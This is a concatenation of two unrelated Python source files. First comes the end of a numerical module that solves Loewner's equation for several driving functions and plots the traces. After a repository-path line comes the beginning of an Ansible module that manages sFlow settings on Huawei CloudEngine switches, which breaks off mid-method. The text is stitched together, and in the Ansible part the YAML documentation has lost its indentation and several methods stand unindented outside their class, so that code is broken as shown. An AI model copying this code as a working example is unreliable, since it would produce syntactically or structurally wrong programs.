            plt.savefig(EXACT_CUBIC_PLOT_OUTPUT + self.short_properties_string + PLOT_EXT, bbox_inches='tight')
class LinearLoewnerRun(LoewnerRun):
    """Loewner run for the linear driving function xi(t) = t."""
    def __init__(self, start_time, final_time, outer_points, inner_points, compile_modules = True, save_data = True, save_plot = True):
        # Invoke the superclass initialiser
        LoewnerRun.__init__(self, LINR_IDX, start_time, final_time, outer_points, inner_points, compile_modules, save_data, save_plot)
        # Set the names and lambda function for the given driving function
        self.name = "t"
        self.latex_name = "$\\xi (t) = t$"
        self.xi = lambda t: t
    def exact_quadratic_forward_loewner(self):
        """Compute the exact quadratic solution by solving a nonlinear
        equation with Muller's method at each exact time value, then
        optionally save the data and a plot."""
        # Declare an empty complex array for the exact results
        self.exact_quadratic_forward = zeros(self.outer_points,dtype = complex128)
        # Define a function for generating an initial guess to be used by the non-linear solver
        def initial_guess(t):
            return 2 * 1j * sqrt(t) + (2./3) * t
        # Define the non-linear function for obtaining the exact solution
        # (its root at time t is the exact trace point)
        def exact_solution(z,t):
            return z + 2 * log(2 - z) - 2 * log(2) - t
        # Iterate through the exact time values
        for i in range(self.outer_points):
            # Use Muller's method for finding the exact solution
            self.exact_quadratic_forward[i] = findroot(lambda z: exact_solution(z, self.exact_time_sol[i]), initial_guess(self.exact_time_sol[i]), solver='muller', tol=TOL)
        if self.save_data:
            # Create a filename for the dat file
            filename = EXACT_FORWARD_DATA_OUTPUT + self.short_properties_string + DATA_EXT
            # Create a 2D array from the real and imaginary values of the results
            results_array = column_stack((self.exact_quadratic_forward.real, self.exact_quadratic_forward.imag))
            # Save the array to the filesystem
            self.save_to_dat(filename, results_array)
        if self.save_plot:
            # Clear any preexisting plots to be safe
            plt.cla()
            # Set the plot title
            self.set_plot_title()
            # Plot the values
            plt.plot(self.exact_quadratic_forward.real, self.exact_quadratic_forward.imag, color='crimson')
            # Set the axes labels
            plt.xlabel(FOR_PLOT_XL)
            plt.ylabel(FOR_PLOT_YL)
            # Set the lower limit of the y-axis
            plt.ylim(bottom=0)
            # Save the plot to the filesystem
            plt.savefig(EXACT_FORWARD_PLOT_OUTPUT + self.short_properties_string + PLOT_EXT, bbox_inches='tight')
    def phi_quadratic_exact(self,start_phi=0,final_phi=pi):
        """Compute the exact quadratic solution parameterised by phi
        (Eq. 24 of Kager et al. 2004) over [start_phi, final_phi],
        then optionally save the data and a plot.

        The endpoints are nudged inwards when they equal 0 or pi, where
        cot(phi) is singular.
        """
        # Calculate a 'temp' delta used to nudge the endpoints
        delta = (final_phi - start_phi) / self.outer_points
        # Increase starting point if start_phi = 0 (cot diverges at 0)
        if start_phi == 0:
            start_phi = delta
        # Decrease end point if final_phi = pi (cot diverges at pi)
        if final_phi == pi:
            final_phi = final_phi - delta
        # Discretise the interval from start_phi to final_phi
        discr_pi = linspace(start_phi,final_phi,self.outer_points)
        # Solve Eq. 24 (Kager et al. 2004) on the range start_phi to final_phi
        self.phi_exact_quadratic_forward = array([2 - 2 * phi * cot(phi) + 2 * 1j * phi for phi in discr_pi],dtype=complex128)
        # Create a properties string specifically for the phi exact solution
        properties_string = "-".join([str(prop) for prop in [self.index, "PHI", self.number_to_string(start_phi), self.number_to_string(final_phi), self.outer_points]])
        if self.save_data:
            # Create a filename for the dat file
            filename = EXACT_FORWARD_DATA_OUTPUT + properties_string + DATA_EXT
            # Create a 2D array from the real and imaginary values of the results
            results_array = column_stack((self.phi_exact_quadratic_forward.real, self.phi_exact_quadratic_forward.imag))
            # Save the array to the filesystem
            self.save_to_dat(filename, results_array)
        if self.save_plot:
            # Clear any preexisting plots to be safe
            plt.cla()
            # Set the plot title
            self.set_plot_title()
            # Plot the values
            plt.plot(self.phi_exact_quadratic_forward.real, self.phi_exact_quadratic_forward.imag, color='crimson')
            # Set the axes labels
            plt.xlabel(FOR_PLOT_XL)
            plt.ylabel(FOR_PLOT_YL)
            # Set the lower limit of the y-axis
            plt.ylim(bottom=0)
            # Save the plot to the filesystem
            plt.savefig(EXACT_FORWARD_PLOT_OUTPUT + properties_string + PLOT_EXT, bbox_inches='tight')
class KappaLoewnerRun(LoewnerRun):
    """Loewner run for the driving function xi(t) = 2*sqrt(kappa*(1 - t)).

    The kappa value is folded into the filename properties strings, so
    this class overrides the property-string setters of the superclass.
    """

    def __init__(self, kappa, start_time, final_time, outer_points, inner_points, compile_modules = True, save_data = True, save_plot = True):
        # Invoke the superclass initialiser
        LoewnerRun.__init__(self, KAPPA_IDX, start_time, final_time, outer_points, inner_points, compile_modules, save_data, save_plot)
        # Set the kappa value
        self.kappa = kappa
        # Regenerate the properties strings so they include kappa
        # (used for creating filenames)
        self.set_properties_string()
        self.set_short_properties_string()
        # Create the names and lambda function for the given driving function
        self.name = "2 * dsqrt(kappa * (1 - t))"
        # Backslashes are doubled so the LaTeX "\ \sqrt" survives Python
        # string escaping; the previous single backslashes were invalid
        # escape sequences (DeprecationWarning, future SyntaxError).
        # The runtime string value is unchanged.
        self.latex_name = "$\\xi (t) = 2 \\ \\sqrt{" + str(self.kappa)[:4] + "\\ (1 - t)}$"
        self.xi = lambda t: 2 * sqrt(self.kappa * (1 - t))

    def set_properties_string(self):
        """Create the filename template including kappa and inner points."""
        # Convert the kappa parameter to a string
        kappa_string = self.number_to_string(self.kappa)
        # Create a list from the run parameters
        properties = [self.index, kappa_string, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points, self.inner_points]
        # Join the stringified parameters into a single filename template
        self.properties_string = "-".join([str(attr) for attr in properties])

    def set_short_properties_string(self):
        """Create the filename template including kappa but not inner points."""
        # Convert the kappa parameter to a string
        kappa_string = self.number_to_string(self.kappa)
        # Create a list from the run parameters (no inner points)
        properties = [self.index, kappa_string, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points]
        # Join the stringified parameters into a single filename template
        self.short_properties_string = "-".join([str(attr) for attr in properties])

    def quadratic_forward_loewner(self):
        """Solve the quadratic Loewner equation for the kappa driving
        function, also producing a copy of the trace translated so that
        it starts at the origin; optionally save data and plots for both."""
        # Import the compiled forward Loewner module
        ForwardLoewner = import_module(self.forward_module_name)
        # Declare an empty complex array for the results
        self.forward_results = empty(self.outer_points, dtype=complex128)
        # Solve Loewner's equation with the given parameters
        ForwardLoewner.quadraticloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresult=self.forward_results, sqrtdrivingarg=self.kappa)
        # Create a copy of the results
        self.translated_results = copy(self.forward_results)
        # Determine the distance from the first point to the origin
        offset = self.translated_results[0].real
        # Shift the whole trace at once so it begins at the origin
        # (vectorised; replaces the old element-by-element loop)
        self.translated_results -= offset
        if self.save_data:
            # Obtain the filenames for both the raw and translated results
            filename = FORWARD_DATA_OUTPUT + self.properties_string + DATA_EXT
            translated_filename = FORSHIFT_DATA_OUTPUT + self.properties_string + DATA_EXT
            # Pair each result set with its filename and save both
            combined_filenames = [filename, translated_filename]
            combined_results = [self.forward_results, self.translated_results]
            for result, filename in zip(combined_results, combined_filenames):
                # Convert the result to a 2D array
                results_array = column_stack((result.real, result.imag))
                # Save the array to the filesystem
                self.save_to_dat(filename, results_array)
        if self.save_plot:
            # Obtain the filenames for both the raw and translated plots
            filename = FORWARD_PLOT_OUTPUT + self.properties_string + PLOT_EXT
            translated_filename = FORSHIFT_PLOT_OUTPUT + self.properties_string + PLOT_EXT
            # Pair each result set with its filename and plot both
            combined_filenames = [filename, translated_filename]
            combined_results = [self.forward_results, self.translated_results]
            for result, filename in zip(combined_results, combined_filenames):
                # Clear any preexisting plots to be safe
                plt.cla()
                # Set the plot title
                self.set_plot_title()
                # Plot the values
                plt.plot(result.real, result.imag, color='crimson')
                # Set the axes labels
                plt.xlabel(FOR_PLOT_XL)
                plt.ylabel(FOR_PLOT_YL)
                # Set the lower limit of the y-axis
                plt.ylim(bottom=0)
                # Save the plot to the filesystem
                plt.savefig(filename, bbox_inches='tight')

    def cubic_forward_loewner(self):
        """Solve the cubic Loewner equation for the kappa driving function."""
        # Import the compiled Forward Loewner module
        ForwardLoewner = import_module(self.forward_module_name)
        # Declare empty complex arrays for the results
        self.cubic_results_a = empty(self.outer_points, dtype=complex128)
        self.cubic_results_b = empty(self.outer_points, dtype=complex128)
        # Solve Loewner's equation with the given parameters
        ForwardLoewner.cubicloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresulta=self.cubic_results_a, zresultb=self.cubic_results_b, sqrtdrivingarg=self.kappa)
        if self.save_data:
            # Create filenames for the data files (one per trace)
            filename_a = CUBIC_DATA_OUTPUT + self.properties_string + "-A" + DATA_EXT
            filename_b = CUBIC_DATA_OUTPUT + self.properties_string + "-B" + DATA_EXT
            # Create 2D arrays from the real and imaginary values of the results
            array_a = column_stack((self.cubic_results_a.real,self.cubic_results_a.imag))
            array_b = column_stack((self.cubic_results_b.real,self.cubic_results_b.imag))
            # Save the arrays to the filesystem
            self.save_to_dat(filename_a, array_a)
            self.save_to_dat(filename_b, array_b)
        if self.save_plot:
            # Clear any preexisting plots to be safe
            plt.cla()
            # Set the plot title
            self.set_plot_title()
            # Plot the data and save it to the filesystem
            self.cubic_forward_plot()
class CAlphaLoewnerRun(LoewnerRun):
    """Loewner run for the driving function xi(t) = c_alpha * sqrt(t),
    where c_alpha = (2 - 4*alpha) / sqrt(alpha - alpha**2).

    The alpha value is folded into the filename properties strings, so
    this class overrides the property-string setters of the superclass.
    """

    def __init__(self, alpha, start_time, final_time, outer_points, inner_points, compile_modules = True, save_data = True, save_plot = True):
        # Invoke the superclass initialiser
        LoewnerRun.__init__(self, CALPHA_IDX, start_time, final_time, outer_points, inner_points, compile_modules, save_data, save_plot)
        # Set the value for alpha. NOTE(review): alpha must lie strictly
        # between 0 and 1 -- otherwise the denominator below is zero or
        # the sqrt argument is negative; no validation is performed here.
        self.alpha = alpha
        # Obtain the value for c_alpha
        self.calpha = (2 - 4 * alpha) / sqrt(alpha - alpha**2)
        # Regenerate the properties strings so they include alpha
        # (used for creating filenames)
        self.set_properties_string()
        self.set_short_properties_string()
        # Create the names and lambda function for the given driving function
        self.name = "dsqrt(t) * c_alpha"
        # Backslash doubled so the LaTeX \sqrt survives Python string
        # escaping; the previous "\s" was an invalid escape sequence
        # (DeprecationWarning, future SyntaxError). The runtime string
        # value is unchanged.
        self.latex_name = "$\\xi (t) = c_{" + str(self.alpha)[:4] + "} \\sqrt{t}$"
        self.xi = lambda t: self.calpha * sqrt(t)

    def set_properties_string(self):
        """Create the filename template including alpha and inner points."""
        # Convert the alpha parameter to a string
        alpha_string = self.number_to_string(self.alpha)
        # Create a list from the run parameters
        properties = [self.index, alpha_string, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points, self.inner_points]
        # Join the stringified parameters into a single filename template
        self.properties_string = "-".join([str(attr) for attr in properties])

    def set_short_properties_string(self):
        """Create the filename template including alpha but not inner points."""
        # Convert the alpha parameter to a string
        alpha_string = self.number_to_string(self.alpha)
        # Create a list from the run parameters (no inner points)
        properties = [self.index, alpha_string, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points]
        # Join the stringified parameters into a single filename template
        self.short_properties_string = "-".join([str(attr) for attr in properties])

    def quadratic_forward_loewner(self):
        """Solve the quadratic Loewner equation, passing alpha to the
        compiled module as a keyword argument."""
        # Import the compiled Forward Loewner module
        ForwardLoewner = import_module(self.forward_module_name)
        # Declare an empty complex array for the results
        self.forward_results = empty(self.outer_points, dtype=complex128)
        # Solve Loewner's equation with the given parameters
        ForwardLoewner.quadraticloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresult=self.forward_results, sqrtdrivingarg=self.alpha)
        if self.save_data:
            # Convert the results to a 2D array
            results_array = column_stack((self.forward_results.real, self.forward_results.imag))
            # Create a filename for the dat file
            filename = FORWARD_DATA_OUTPUT + self.properties_string + DATA_EXT
            # Save the array to the filesystem
            self.save_to_dat(filename, results_array)
        if self.save_plot:
            # Clear any preexisting plots to be safe
            plt.cla()
            # Set the plot title
            self.set_plot_title()
            # Plot the data and save it to the filesystem
            self.quadratic_forward_plot()

    def cubic_forward_loewner(self):
        """Solve the cubic Loewner equation for the c_alpha driving function."""
        # Import the compiled Forward Loewner module
        ForwardLoewner = import_module(self.forward_module_name)
        # Declare empty complex arrays for the results
        self.cubic_results_a = empty(self.outer_points, dtype=complex128)
        self.cubic_results_b = empty(self.outer_points, dtype=complex128)
        # Solve Loewner's equation with the given parameters
        ForwardLoewner.cubicloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresulta=self.cubic_results_a, zresultb=self.cubic_results_b, sqrtdrivingarg=self.alpha)
        if self.save_data:
            # Create filenames for the data files (one per trace)
            filename_a = CUBIC_DATA_OUTPUT + self.properties_string + "-A" + DATA_EXT
            filename_b = CUBIC_DATA_OUTPUT + self.properties_string + "-B" + DATA_EXT
            # Create 2D arrays from the real and imaginary values of the results
            array_a = column_stack((self.cubic_results_a.real,self.cubic_results_a.imag))
            array_b = column_stack((self.cubic_results_b.real,self.cubic_results_b.imag))
            # Save the arrays to the filesystem
            self.save_to_dat(filename_a, array_a)
            self.save_to_dat(filename_b, array_b)
        if self.save_plot:
            # Clear any preexisting plots to be safe
            plt.cla()
            # Set the plot title
            self.set_plot_title()
            # Plot the data and save it to the filesystem
            self.cubic_forward_plot()
class SqrtTPlusOneLoewnerRun(LoewnerRun):
    """Loewner run for the driving function xi(t) = sqrt(1 + t)."""

    def __init__(self, start_time, final_time, outer_points, inner_points, compile_modules = True, save_data = True, save_plot = True):
        # Invoke the superclass initialiser
        LoewnerRun.__init__(self, SQRTPLUS_IDX, start_time, final_time, outer_points, inner_points, compile_modules, save_data, save_plot)
        # Create the names and lambda function for the given driving function
        self.name = "sqrt(1 + t)"
        # Backslash doubled so the LaTeX \sqrt survives Python string
        # escaping; the previous "\s" was an invalid escape sequence
        # (DeprecationWarning, future SyntaxError). The runtime string
        # value is unchanged.
        self.latex_name = "$\\xi (t) = \\sqrt{1 + t}$"
        self.xi = lambda t: sqrt(1 + t)

    def exact_cubic_forward_loewner(self):
        """Compute the exact cubic solution by finding polynomial roots
        at each exact time value, then optionally save the data and a plot."""
        # Declare empty complex arrays for the exact results
        self.exact_cubic_sol_a = zeros(self.outer_points, dtype = complex128)
        self.exact_cubic_sol_b = zeros(self.outer_points, dtype = complex128)
        # Set the 'weights' of the exact solution
        a0 = 1
        d0 = 1
        # Coefficients of the quintic whose root gives the exact solution;
        # the two traces differ only in the sign of the constant term
        def get_coeffs_a(t):
            return [-1, 0, 10*a0**2, 0, -25*a0**4, 16*(a0**2 + d0 * t)**(5./2)]
        def get_coeffs_b(t):
            return [-1, 0, 10*a0**2, 0, -25*a0**4, -16*(a0**2 + d0 * t)**(5./2)]
        # Iterate through the exact time values
        for i in range(self.outer_points):
            # Find the roots of the polynomials at the given time value
            exact_roots_a = roots(get_coeffs_a(self.exact_time_sol[i]))
            exact_roots_b = roots(get_coeffs_b(self.exact_time_sol[i]))
            # Select the fourth root (the one with the positive imaginary
            # component). NOTE(review): numpy.roots does not guarantee any
            # particular ordering of the returned roots -- confirm this
            # index remains the intended root across numpy versions.
            self.exact_cubic_sol_a[i] = exact_roots_a[3]
            self.exact_cubic_sol_b[i] = exact_roots_b[3]
        if self.save_data:
            # Create filenames for the dat files (one per trace)
            filename_a = EXACT_CUBIC_DATA_OUTPUT + self.short_properties_string + "-A" + DATA_EXT
            filename_b = EXACT_CUBIC_DATA_OUTPUT + self.short_properties_string + "-B" + DATA_EXT
            # Create 2D arrays from the real and imaginary values of the results
            array_a = column_stack((self.exact_cubic_sol_a.real, self.exact_cubic_sol_a.imag))
            array_b = column_stack((self.exact_cubic_sol_b.real, self.exact_cubic_sol_b.imag))
            # Save the arrays to the filesystem
            self.save_to_dat(filename_a, array_a)
            self.save_to_dat(filename_b, array_b)
        if self.save_plot:
            # Clear any preexisting plots to be safe
            plt.cla()
            # Set the plot title
            self.set_plot_title()
            # Plot the results
            plt.plot(self.exact_cubic_sol_a.real, self.exact_cubic_sol_a.imag, color='crimson')
            plt.plot(self.exact_cubic_sol_b.real, self.exact_cubic_sol_b.imag, color='crimson')
            # Set the axes labels
            plt.xlabel(FOR_PLOT_XL)
            plt.ylabel(FOR_PLOT_YL)
            # Set the lower limit of the y-axis
            plt.ylim(bottom=0)
            # Save the plot to the filesystem
            plt.savefig(EXACT_CUBIC_PLOT_OUTPUT + self.short_properties_string + PLOT_EXT, bbox_inches='tight')
|
ptemplier/ansible | refs/heads/devel | lib/ansible/modules/network/cloudengine/ce_sflow.py | 26 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Ansible metadata: community-supported module in preview status.
ANSIBLE_METADATA = {
    'metadata_version': '1.1',
    'status': ['preview'],
    'supported_by': 'community',
}
DOCUMENTATION = """
---
module: ce_sflow
version_added: "2.4"
short_description: Manages sFlow configuration on HUAWEI CloudEngine switches.
description:
- Configure Sampled Flow (sFlow) to monitor traffic on an interface in real time,
detect abnormal traffic, and locate the source of attack traffic,
ensuring stable running of the network.
author: QijunPan (@CloudEngine-Ansible)
options:
agent_ip:
description:
- Specifies the IPv4/IPv6 address of an sFlow agent.
required: false
default: null
source_ip:
description:
- Specifies the source IPv4/IPv6 address of sFlow packets.
required: false
default: null
collector_id:
description:
- Specifies the ID of an sFlow collector. This ID is used when you specify
the collector in subsequent sFlow configuration.
required: false
default: null
choices: ['1', '2']
collector_ip:
description:
- Specifies the IPv4/IPv6 address of the sFlow collector.
required: false
default: null
collector_ip_vpn:
description:
- Specifies the name of a VPN instance.
The value is a string of 1 to 31 case-sensitive characters, spaces not supported.
When double quotation marks are used around the string, spaces are allowed in the string.
The value C(_public_) is reserved and cannot be used as the VPN instance name.
required: false
default: null
collector_datagram_size:
description:
- Specifies the maximum length of sFlow packets sent from an sFlow agent to an sFlow collector.
The value is an integer, in bytes. It ranges from 1024 to 8100. The default value is 1400.
required: false
default: null
collector_udp_port:
description:
- Specifies the UDP destination port number of sFlow packets.
The value is an integer that ranges from 1 to 65535. The default value is 6343.
required: false
default: null
collector_meth:
description:
- Configures the device to send sFlow packets through service interfaces,
enhancing the sFlow packet forwarding capability.
The enhanced parameter is optional. No matter whether you configure the enhanced mode,
the switch determines to send sFlow packets through service cards or management port
based on the routing information on the collector.
When the value is meth, the device forwards sFlow packets at the control plane.
When the value is enhanced, the device forwards sFlow packets at the forwarding plane to
enhance the sFlow packet forwarding capacity.
required: false
default: null
choices: ['meth', 'enhanced']
collector_description:
description:
- Specifies the description of an sFlow collector.
The value is a string of 1 to 255 case-sensitive characters without spaces.
required: false
default: null
sflow_interface:
description:
- Full name of interface for Flow Sampling or Counter.
It must be a physical interface, Eth-Trunk, or Layer 2 subinterface.
required: false
default: null
sample_collector:
description:
- Indicates the ID list of the collector.
required: false
default: null
sample_rate:
description:
- Specifies the flow sampling rate in the format 1/rate.
The value is an integer and ranges from 1 to 4294967295. The default value is 8192.
required: false
default: null
sample_length:
description:
- Specifies the maximum length of sampled packets.
The value is an integer and ranges from 18 to 512, in bytes. The default value is 128.
required: false
default: null
sample_direction:
description:
- Enables flow sampling in the inbound or outbound direction.
required: false
default: null
choices: ['inbound', 'outbound', 'both']
counter_collector:
description:
- Indicates the ID list of the counter collector.
required: false
default: null
counter_interval:
description:
- Indicates the counter sampling interval.
The value is an integer that ranges from 10 to 4294967295, in seconds. The default value is 20.
required: false
default: null
export_route:
description:
- Configures the sFlow packets sent by the switch not to carry routing information.
required: false
default: null
choices: ['enable', 'disable']
rate_limit:
description:
- Specifies the rate of sFlow packets sent from a card to the control plane.
The value is an integer that ranges from 100 to 1500, in pps.
required: false
default: null
rate_limit_slot:
description:
- Specifies the slot where the rate of output sFlow packets is limited.
If this parameter is not specified, the rate of sFlow packets sent from
all cards to the control plane is limited.
The value is an integer or a string of characters.
required: false
default: null
forward_enp_slot:
description:
- Enable the Embedded Network Processor (ENP) chip function.
The switch uses the ENP chip to perform sFlow sampling,
and the maximum sFlow sampling interval is 65535.
If you set the sampling interval to be larger than 65535,
the switch automatically restores it to 65535.
The value is an integer or 'all'.
required: false
default: null
state:
description:
- Determines whether the config should be present or not
on the device.
required: false
default: present
choices: ['present', 'absent']
"""
EXAMPLES = '''
---
- name: sflow module test
hosts: ce128
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: Configuring sFlow Agent
ce_sflow:
agent_ip: 6.6.6.6
provider: '{{ cli }}'
- name: Configuring sFlow Collector
ce_sflow:
collector_id: 1
collector_ip: 7.7.7.7
collector_ip_vpn: vpn1
collector_description: Collector1
provider: '{{ cli }}'
- name: Configure flow sampling.
ce_sflow:
sflow_interface: 10GE2/0/2
sample_collector: 1
sample_direction: inbound
provider: '{{ cli }}'
- name: Configure counter sampling.
ce_sflow:
sflow_interface: 10GE2/0/2
counter_collector: 1
counter_interval: 1000
provider: '{{ cli }}'
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: verbose mode
type: dict
sample: {"agent_ip": "6.6.6.6", "state": "present"}
existing:
description: k/v pairs of existing configuration
returned: verbose mode
type: dict
sample: {"agent": {}}
end_state:
description: k/v pairs of configuration after module execution
returned: verbose mode
type: dict
sample: {"agent": {"family": "ipv4", "ipv4Addr": "1.2.3.4", "ipv6Addr": null}}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["sflow agent ip 6.6.6.6"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
import re
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_nc_config, set_nc_config, ce_argument_spec, check_ip_addr
from ansible.module_utils.ce import get_config, load_config
CE_NC_GET_SFLOW = """
<filter type="subtree">
<sflow xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<sources>
<source>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
</source>
</sources>
<agents>
<agent>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
</agent>
</agents>
<collectors>
<collector>
<collectorID></collectorID>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
<vrfName></vrfName>
<datagramSize></datagramSize>
<port></port>
<description></description>
<meth></meth>
</collector>
</collectors>
<samplings>
<sampling>
<ifName>%s</ifName>
<collectorID></collectorID>
<direction></direction>
<length></length>
<rate></rate>
</sampling>
</samplings>
<counters>
<counter>
<ifName>%s</ifName>
<collectorID></collectorID>
<interval></interval>
</counter>
</counters>
<exports>
<export>
<ExportRoute></ExportRoute>
</export>
</exports>
</sflow>
</filter>
"""
def is_config_exist(cmp_cfg, test_cfg):
    """Return True when *test_cfg* occurs as a substring of *cmp_cfg*.

    Either argument being empty/None yields False.
    """
    if cmp_cfg and test_cfg:
        return test_cfg in cmp_cfg
    return False
def is_valid_ip_vpn(vpname):
    """Validate a VPN-instance name.

    Valid names are non-empty, not the reserved "_public_", and 1-31
    characters long.
    """
    if not vpname or vpname == "_public_":
        return False
    return 1 <= len(vpname) <= 31
def get_ip_version(address):
    """Cheaply classify *address* as "ipv4" or "ipv6" by separator counts.

    Returns None for empty input or anything that matches neither shape.
    This is a fast heuristic, not a full address validation.
    """
    if not address:
        return None
    colons = address.count(':')
    if 2 <= colons <= 7:
        return "ipv6"
    if address.count('.') == 3:
        return "ipv4"
    return None
def get_interface_type(interface):
    """Return the canonical lower-case type of an interface name.

    E.g. '10GE2/0/2' -> '10ge', 'Eth-Trunk10' -> 'eth-trunk'. Returns None
    for None input or an unrecognised prefix.

    Rewritten from a 20-branch if/elif chain into a first-match prefix table;
    the original branch order is preserved, so matching behavior is identical
    (no prefix in the table is a leading substring of a later entry's input).
    The redundant trailing .lower() was dropped -- all mapped values are
    already lower-case.
    """
    if interface is None:
        return None
    # (upper-case prefix, interface type), in the original chain's order.
    prefix_map = (
        ('GE', 'ge'),
        ('10GE', '10ge'),
        ('25GE', '25ge'),
        ('4X10GE', '4x10ge'),
        ('40GE', '40ge'),
        ('100GE', '100ge'),
        ('VLANIF', 'vlanif'),
        ('LOOPBACK', 'loopback'),
        ('METH', 'meth'),
        ('ETH-TRUNK', 'eth-trunk'),
        ('VBDIF', 'vbdif'),
        ('NVE', 'nve'),
        ('TUNNEL', 'tunnel'),
        ('ETHERNET', 'ethernet'),
        ('FCOE-PORT', 'fcoe-port'),
        ('FABRIC-PORT', 'fabric-port'),
        ('STACK-PORT', 'stack-port'),
        ('NULL', 'null'),
    )
    name = interface.upper()
    for prefix, iftype in prefix_map:
        if name.startswith(prefix):
            return iftype
    return None
def get_rate_limit(config):
    """Parse 'sflow management-plane export rate-limit' lines from *config*.

    Returns a list of {'rate_limit', 'slot_id'} dicts when per-slot entries
    exist, a single {'rate_limit'} dict for a global entry, or None when the
    command is absent. (The mixed return type is preserved for callers.)
    """
    per_slot = re.findall(
        r"sflow management-plane export rate-limit ([0-9]+) slot ([0-9]+)", config)
    if per_slot:
        return [dict(rate_limit=rate, slot_id=slot) for rate, slot in per_slot]
    plain = re.findall(
        r"sflow management-plane export rate-limit ([0-9]+)", config)
    if plain:
        return dict(rate_limit=plain[0])
    return None
def get_forward_enp(config):
    """Return slot ids from 'assign forward enp sflow enable slot' lines.

    Returns a list of slot-id strings, or None when no such line exists.
    """
    slots = re.findall(r"assign forward enp sflow enable slot (\S+)", config)
    return list(slots) if slots else None
class Sflow(object):
    """Manages sFlow configuration on HUAWEI CloudEngine switches.

    Reads the current sFlow state over netconf, computes the delta against the
    requested module parameters, and applies it via netconf (and CLI for the
    'assign ...' commands).
    """
    def __init__(self, argument_spec):
        """Build the AnsibleModule, read its parameters and init run state.

        argument_spec: argument spec dict passed through to AnsibleModule.
        """
        self.spec = argument_spec
        self.module = None
        self.__init_module__()
        # module input info
        self.agent_ip = self.module.params['agent_ip']
        # *_version fields are derived later (config_agent/config_source/
        # config_collector) via get_ip_version()
        self.agent_version = None
        self.source_ip = self.module.params['source_ip']
        self.source_version = None
        self.export_route = self.module.params['export_route']
        self.rate_limit = self.module.params['rate_limit']
        self.rate_limit_slot = self.module.params['rate_limit_slot']
        self.forward_enp_slot = self.module.params['forward_enp_slot']
        self.collector_id = self.module.params['collector_id']
        self.collector_ip = self.module.params['collector_ip']
        self.collector_version = None
        self.collector_ip_vpn = self.module.params['collector_ip_vpn']
        self.collector_datagram_size = self.module.params['collector_datagram_size']
        self.collector_udp_port = self.module.params['collector_udp_port']
        self.collector_meth = self.module.params['collector_meth']
        self.collector_description = self.module.params['collector_description']
        self.sflow_interface = self.module.params['sflow_interface']
        # collector id lists default to empty lists so set operations are safe
        self.sample_collector = self.module.params['sample_collector'] or list()
        self.sample_rate = self.module.params['sample_rate']
        self.sample_length = self.module.params['sample_length']
        self.sample_direction = self.module.params['sample_direction']
        self.counter_collector = self.module.params['counter_collector'] or list()
        self.counter_interval = self.module.params['counter_interval']
        self.state = self.module.params['state']
        # state
        self.config = ""  # current config
        self.sflow_dict = dict()
        self.changed = False
        # updates_cmd: human-readable change list returned to the user;
        # commands: CLI lines actually sent to the device
        self.updates_cmd = list()
        self.commands = list()
        self.results = dict()
        self.proposed = dict()
        self.existing = dict()
        self.end_state = dict()
def __init_module__(self):
"""init module"""
required_together = [("collector_id", "collector_ip")]
self.module = AnsibleModule(
argument_spec=self.spec, required_together=required_together, supports_check_mode=True)
def check_response(self, con_obj, xml_name):
"""Check if response message is already succeed"""
xml_str = con_obj.xml
if "<ok/>" not in xml_str:
self.module.fail_json(msg='Error: %s failed.' % xml_name)
def netconf_set_config(self, xml_str, xml_name):
"""netconf set config"""
rcv_xml = set_nc_config(self.module, xml_str)
if "<ok/>" not in rcv_xml:
self.module.fail_json(msg='Error: %s failed.' % xml_name)
def cli_load_config(self, commands):
"""load config by cli"""
if not self.module.check_mode:
load_config(self.module, commands)
def get_current_config(self):
"""get current configuration"""
flags = list()
exp = ""
if self.rate_limit:
exp += "assign sflow management-plane export rate-limit %s" % self.rate_limit
if self.rate_limit_slot:
exp += " slot %s" % self.rate_limit_slot
exp += "$"
if self.forward_enp_slot:
if exp:
exp += "|"
exp += "assign forward enp sflow enable slot %s$" % self.forward_enp_slot
if exp:
exp = " | ignore-case include " + exp
flags.append(exp)
return get_config(self.module, flags)
else:
return ""
def cli_add_command(self, command, undo=False):
"""add command to self.update_cmd and self.commands"""
if undo and command.lower() not in ["quit", "return"]:
cmd = "undo " + command
else:
cmd = command
self.commands.append(cmd) # set to device
if command.lower() not in ["quit", "return"]:
self.updates_cmd.append(cmd) # show updates result
    def get_sflow_dict(self):
        """Query the device over netconf and return the current sFlow state.

        Returns a dict with keys source/agent/collector/sampling/counter/
        export. source and collector hold lists of attribute dicts; the other
        keys hold a single (possibly empty) attribute dict.
        """
        sflow_dict = dict(source=list(), agent=dict(), collector=list(),
                          sampling=dict(), counter=dict(), export=dict())
        # both placeholders in the filter take the target interface name
        conf_str = CE_NC_GET_SFLOW % (
            self.sflow_interface, self.sflow_interface)
        # drop the <meth> leaf from the query when it was not requested
        # NOTE(review): presumably some devices reject the leaf -- confirm
        if not self.collector_meth:
